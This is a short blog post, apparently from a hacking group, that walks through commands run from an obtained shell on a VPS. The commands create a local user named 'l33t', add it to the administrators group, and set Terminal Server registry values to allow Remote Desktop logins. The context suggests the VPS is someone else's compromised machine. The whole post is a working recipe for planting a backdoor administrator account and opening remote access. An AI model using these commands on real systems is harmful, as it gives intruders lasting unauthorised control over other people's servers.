New Post

Sunday, October 14, 2012

First execute command on shell >

Code:
net user l33t p4$sword /add
l33t=username p4$sword=password

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution the shell will give you a result like this :

Code:
The command completed successfully.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

The user has been added with success now we need to add it on administrators group.


Attention: If the VPS Has an your unknown Language use google translate ( AutoDetect ).

Now to add administrator access to your user >

Code:
net localgroup administrators l33t /add
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

After execution connect to the VPS

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

If the VPS Have an static ip but doesn’t connect on (mstsc) use these commands to allow remote users :

Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
Bingo Have fun !

credits to Ninja

0 nhận xét:

Post a Comment